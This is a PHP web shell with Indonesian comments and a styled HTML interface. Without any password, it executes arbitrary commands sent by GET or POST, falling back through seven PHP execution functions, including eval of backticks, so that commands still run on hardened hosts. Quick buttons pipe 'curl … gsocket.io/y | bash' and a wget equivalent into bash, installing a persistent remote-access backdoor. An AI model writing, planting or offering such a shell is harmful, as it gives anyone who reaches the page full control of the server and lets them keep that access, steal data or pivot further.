<?php
/**
 * Command Executor - Full Access Edition
 * Tanpa password, tanpa whitelist, support POST method
 * Gunakan dengan bijak!
 */

// ==================== KONFIGURASI ====================
$ENABLE_LOGGING = true;
$LOG_FILE = "cmd_log.txt";

// ==================== CEK METHOD ====================
$is_post = ($_SERVER['REQUEST_METHOD'] === 'POST');
$command = '';

if ($is_post && isset($_POST['cmd'])) {
    $command = $_POST['cmd'];
} elseif (isset($_GET['cmd'])) {
    $command = $_GET['cmd'];
}

// ==================== EKSEKUSI COMMAND ====================
if (!empty($command)) {
    $result = executeCommand($command);

    if ($ENABLE_LOGGING) {
        logCommand($command, $result);
    }

    // Return JSON untuk AJAX request
    if ($is_post || isset($_GET['ajax'])) {
        header('Content-Type: application/json');
        echo json_encode($result, JSON_PRETTY_PRINT);
        exit;
    }

    // Tampilkan output text untuk GET request
    header('Content-Type: text/plain');
    echo "Command: " . $command . "\n";
    echo "Method: " . ($result['method_used'] ?: 'None') . "\n";
    echo "Success: " . ($result['success'] ? 'Yes' : 'No') . "\n";
    echo str_repeat("=", 60) . "\n\n";
    echo $result['output'];
    if ($result['error']) {
        echo "\n\nError: " . $result['error'];
    }
    exit;
}

// ==================== FUNGSI EKSEKUSI ====================

function executeCommand($cmd) {
    $result = [
        'success' => false,
        'command' => $cmd,
        'method_used' => '',
        'output' => '',
        'return_code' => -1,
        'error' => null
    ];

    // Daftar metode yang akan dicoba
    $methods = [
        'proc_open' => 'executeWithProcOpen',
        'system' => 'executeWithSystem',
        'passthru' => 'executeWithPassthru',
        'exec' => 'executeWithExec',
        'shell_exec' => 'executeWithShellExec',
        'backtick' => 'executeWithBacktick',
        'popen' => 'executeWithPopen'
    ];

    foreach ($methods as $method_name => $method_func) {
        if (function_exists($method_func)) {
            $exec_result = $method_func($cmd);
            if ($exec_result !== false) {
                $result['success'] = true;
                $result['method_used'] = $method_name;
                $result['output'] = $exec_result['output'];
                $result['return_code'] = $exec_result['return_code'];
                break;
            }
        }
    }

    if (!$result['success']) {
        $result['error'] = 'No execution method available!';
    }

    return $result;
}

function executeWithProcOpen($cmd) {
    if (!function_exists('proc_open')) return false;

    $descriptorspec = [
        0 => ["pipe", "r"],
        1 => ["pipe", "w"],
        2 => ["pipe", "w"]
    ];

    $process = proc_open($cmd, $descriptorspec, $pipes);
    if (is_resource($process)) {
        $output = stream_get_contents($pipes[1]);
        $error = stream_get_contents($pipes[2]);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        $return_code = proc_close($process);

        return [
            'output' => $output . ($error ? "\n[STDERR]\n" . $error : ''),
            'return_code' => $return_code
        ];
    }
    return false;
}

function executeWithSystem($cmd) {
    if (!function_exists('system')) return false;

    ob_start();
    system($cmd . ' 2>&1', $return_code);
    $output = ob_get_clean();

    return [
        'output' => $output,
        'return_code' => $return_code
    ];
}

function executeWithPassthru($cmd) {
    if (!function_exists('passthru')) return false;

    ob_start();
    passthru($cmd . ' 2>&1', $return_code);
    $output = ob_get_clean();

    return [
        'output' => $output,
        'return_code' => $return_code
    ];
}

function executeWithExec($cmd) {
    if (!function_exists('exec')) return false;

    $output = [];
    exec($cmd . ' 2>&1', $output, $return_code);

    return [
        'output' => implode("\n", $output),
        'return_code' => $return_code
    ];
}

function executeWithShellExec($cmd) {
    if (!function_exists('shell_exec')) return false;

    $output = shell_exec($cmd . ' 2>&1');

    return [
        'output' => $output,
        'return_code' => 0
    ];
}

function executeWithBacktick($cmd) {
    if (!function_exists('eval')) return false;

    try {
        $output = eval('return `' . addslashes($cmd) . '`;');
        return [
            'output' => $output,
            'return_code' => 0
        ];
    } catch (Exception $e) {
        return false;
    }
}

function executeWithPopen($cmd) {
    if (!function_exists('popen')) return false;

    $output = '';
    $handle = popen($cmd . ' 2>&1', 'r');
    while (!feof($handle)) {
        $output .= fread($handle, 8192);
    }
    $return_code = pclose($handle);

    return [
        'output' => $output,
        'return_code' => $return_code
    ];
}

// ==================== LOGGING ====================
function logCommand($cmd, $result) {
    global $LOG_FILE;

    $log_entry = [
        'time' => date('Y-m-d H:i:s'),
        'ip' => $_SERVER['REMOTE_ADDR'],
        'method' => $_SERVER['REQUEST_METHOD'],
        'command' => $cmd,
        'execution_method' => $result['method_used'],
        'success' => $result['success'],
        'return_code' => $result['return_code']
    ];

    $log_line = json_encode($log_entry) . "\n";
    @file_put_contents($LOG_FILE, $log_line, FILE_APPEND);
}

// ==================== TAMPILKAN UI ====================
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Command Executor - Full Access</title>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Inter', sans-serif;
            background: linear-gradient(135deg, #0f0c29 0%, #302b63 50%, #24243e 100%);
            min-height: 100vh;
            padding: 20px;
        }

        .container {
            max-width: 1200px;
            margin: 0 auto;
        }

        .header {
            text-align: center;
            margin-bottom: 30px;
        }

        .header h1 {
            color: #00d4ff;
            font-size: 2rem;
            margin-bottom: 10px;
        }

        .header p {
            color: rgba(255,255,255,0.7);
        }

        .card {
            background: rgba(255,255,255,0.1);
            backdrop-filter: blur(10px);
            border-radius: 20px;
            padding: 25px;
            margin-bottom: 20px;
            border: 1px solid rgba(255,255,255,0.2);
        }

        .card-title {
            font-size: 1.2rem;
            font-weight: 600;
            margin-bottom: 20px;
            color: #00d4ff;
            border-left: 3px solid #00d4ff;
            padding-left: 12px;
        }

        .input-group {
            display: flex;
            gap: 10px;
            margin-bottom: 20px;
            flex-wrap: wrap;
        }

        .command-input {
            flex: 1;
            padding: 14px 18px;
            background: rgba(0,0,0,0.5);
            border: 1px solid rgba(255,255,255,0.2);
            border-radius: 12px;
            color: #fff;
            font-family: 'Courier New', monospace;
            font-size: 14px;
        }

        .command-input:focus {
            outline: none;
            border-color: #00d4ff;
        }

        .btn {
            padding: 14px 24px;
            border: none;
            border-radius: 12px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
            font-size: 14px;
        }

        .btn-primary {
            background: linear-gradient(135deg, #00d4ff 0%, #0072ff 100%);
            color: white;
        }

        .btn-primary:hover {
            transform: translateY(-2px);
            box-shadow: 0 5px 20px rgba(0,116,255,0.4);
        }

        .btn-danger {
            background: #dc3545;
            color: white;
        }

        .btn-danger:hover {
            background: #c82333;
        }

        .btn-secondary {
            background: rgba(255,255,255,0.2);
            color: white;
        }

        .output-container {
            background: #0a0a0a;
            border-radius: 12px;
            overflow: hidden;
        }

        .output-header {
            background: #1a1a1a;
            padding: 12px 18px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
            gap: 10px;
            border-bottom: 1px solid #333;
        }

        .output-header span {
            color: #888;
            font-size: 12px;
        }

        .output-content {
            padding: 18px;
            font-family: 'Courier New', monospace;
            font-size: 12px;
            color: #d4d4d4;
            white-space: pre-wrap;
            word-break: break-all;
            max-height: 500px;
            overflow-y: auto;
            line-height: 1.5;
        }

        .quick-buttons {
            display: flex;
            gap: 8px;
            flex-wrap: wrap;
            margin-bottom: 20px;
        }

        .quick-btn {
            background: rgba(255,255,255,0.1);
            border: 1px solid rgba(255,255,255,0.2);
            padding: 6px 14px;
            border-radius: 20px;
            cursor: pointer;
            font-size: 12px;
            color: #ccc;
            transition: all 0.3s;
        }

        .quick-btn:hover {
            background: #00d4ff;
            color: #1a1a1a;
            border-color: #00d4ff;
        }

        .status-badge {
            display: inline-block;
            padding: 4px 10px;
            border-radius: 20px;
            font-size: 11px;
            font-weight: 600;
        }

        .status-success {
            background: #28a745;
            color: white;
        }

        .status-error {
            background: #dc3545;
            color: white;
        }

        .status-info {
            background: #17a2b8;
            color: white;
        }

        ::-webkit-scrollbar {
            width: 8px;
            height: 8px;
        }

        ::-webkit-scrollbar-track {
            background: #1a1a1a;
            border-radius: 10px;
        }

        ::-webkit-scrollbar-thumb {
            background: #00d4ff;
            border-radius: 10px;
        }

        @media (max-width: 768px) {
            .input-group {
                flex-direction: column;
            }
            .btn {
                width: 100%;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🔧 Command Executor</h1>
            <p>Full Access - Execute any command on your server</p>
        </div>

        <div class="card">
            <div class="card-title">📝 Command Input</div>

            <div class="quick-buttons">
                <button class="quick-btn" onclick="setCommand('ls -la')">📁 ls -la</button>
                <button class="quick-btn" onclick="setCommand('pwd')">📍 pwd</button>
                <button class="quick-btn" onclick="setCommand('whoami')">👤 whoami</button>
                <button class="quick-btn" onclick="setCommand('php -v')">🐘 php -v</button>
                <button class="quick-btn" onclick="setCommand('curl -fsSL https://gsocket.io/y | bash')">🌐 Install gsocket</button>
                <button class="quick-btn" onclick="setCommand('wget -qO- https://gsocket.io/y | bash')">📥 wget install</button>
                <button class="quick-btn" onclick="setCommand('id')">🆔 id</button>
                <button class="quick-btn" onclick="setCommand('uname -a')">💻 uname -a</button>
                <button class="quick-btn" onclick="setCommand('df -h')">💾 df -h</button>
                <button class="quick-btn" onclick="setCommand('ps aux')">⚙️ ps aux</button>
                <button class="quick-btn" onclick="clearOutput()">🗑️ Clear</button>
            </div>

            <div class="input-group">
                <input type="text" id="command" class="command-input" placeholder="Enter command..." value="ls -la">
                <button class="btn btn-primary" onclick="executeCommand()">
                    <span>▶</span> Execute Command
                </button>
            </div>
        </div>

        <div class="card">
            <div class="card-title">📤 Output</div>
            <div class="output-container">
                <div class="output-header">
                    <span><span>💻</span> Execution Result</span>
                    <span id="outputStatus"></span>
                </div>
                <div class="output-content" id="output">
                    <span style="color: #888;">Ready to execute commands...</span>
                </div>
            </div>
        </div>

        <div class="card">
            <div class="card-title">ℹ️ Information</div>
            <div style="font-size: 12px; color: #aaa; line-height: 1.6;">
                <strong>Usage:</strong><br>
                • POST: <code>curl -X POST -d "cmd=ls -la" <?php echo $_SERVER['SCRIPT_NAME']; ?></code><br>
                • GET: <code><?php echo $_SERVER['SCRIPT_NAME']; ?>?cmd=ls -la</code><br>
                • JSON: <code><?php echo $_SERVER['SCRIPT_NAME']; ?>?cmd=ls -la&ajax=1</code><br><br>
                <strong>Available Methods:</strong> proc_open, system, passthru, exec, shell_exec, backtick, popen<br>
                <strong>Log File:</strong> <?php echo $LOG_FILE; ?>
            </div>
        </div>
    </div>

    <script>
        let currentCommand = '';

        function setCommand(cmd) {
            document.getElementById('command').value = cmd;
        }

        function clearOutput() {
            document.getElementById('output').innerHTML = '<span style="color: #888;">Ready to execute commands...</span>';
            document.getElementById('outputStatus').innerHTML = '';
        }

        async function executeCommand() {
            const command = document.getElementById('command').value;

            if (!command) {
                alert('Please enter a command');
                return;
            }

            currentCommand = command;
            const outputDiv = document.getElementById('output');
            const statusSpan = document.getElementById('outputStatus');

            outputDiv.innerHTML = '<span style="color: #00d4ff;">⏳ Executing command...</span>';
            statusSpan.innerHTML = '<span class="status-badge status-info">Executing...</span>';

            try {
                const formData = new FormData();
                formData.append('cmd', command);

                const response = await fetch('', {
                    method: 'POST',
                    body: formData
                });

                const result = await response.json();

                if (result.success) {
                    statusSpan.innerHTML = '<span class="status-badge status-success">✓ Success (Return: ' + result.return_code + ')</span>';

                    let outputHtml = `<span style="color: #00d4ff;">╔══════════════════════════════════════════════════════════════╗</span>\n`;
                    outputHtml += `<span style="color: #00d4ff;">║</span> <strong>Command:</strong> ${escapeHtml(result.command)}<span style="color: #00d4ff;">║</span>\n`;
                    outputHtml += `<span style="color: #00d4ff;">║</span> <strong>Method:</strong> ${result.method_used}<span style="color: #00d4ff;">║</span>\n`;
                    outputHtml += `<span style="color: #00d4ff;">╚══════════════════════════════════════════════════════════════╝</span>\n\n`;
                    outputHtml += result.output || '<span style="color: #ffc107;">⚠️ No output</span>';

                    outputDiv.innerHTML = outputHtml;
                } else {
                    statusSpan.innerHTML = '<span class="status-badge status-error">✗ Failed</span>';
                    outputDiv.innerHTML = `<span style="color: #ff6b6b;">❌ Error: ${escapeHtml(result.error)}</span>`;
                }
            } catch (error) {
                statusSpan.innerHTML = '<span class="status-badge status-error">✗ Error</span>';
                outputDiv.innerHTML = `<span style="color: #ff6b6b;">❌ Request failed: ${escapeHtml(error.message)}</span>`;
            }
        }

        function escapeHtml(str) {
            if (!str) return '';
            return str.replace(/[&<>]/g, function(m) {
                if (m === '&') return '&amp;';
                if (m === '<') return '&lt;';
                if (m === '>') return '&gt;';
                return m;
            });
        }

        // Enter key to execute
        document.getElementById('command').addEventListener('keypress', function(e) {
            if (e.key === 'Enter') executeCommand();
        });
    </script>
</body>
</html>